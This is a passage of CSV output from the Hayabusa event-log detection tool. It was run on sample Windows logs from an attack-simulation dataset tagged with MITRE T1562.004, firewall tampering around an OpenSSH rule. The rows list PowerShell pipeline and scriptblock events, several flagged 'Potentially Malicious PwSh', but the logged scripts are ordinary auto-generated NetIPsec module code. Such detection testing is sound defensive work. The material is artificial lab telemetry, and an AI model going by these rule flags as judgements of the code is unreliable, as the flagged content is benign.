ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.452 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.462 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.462 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } 
catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.463 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.463 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.477 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.477 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule 
activation.evtx +2021-04-23 19:09:45.480 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.499 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] 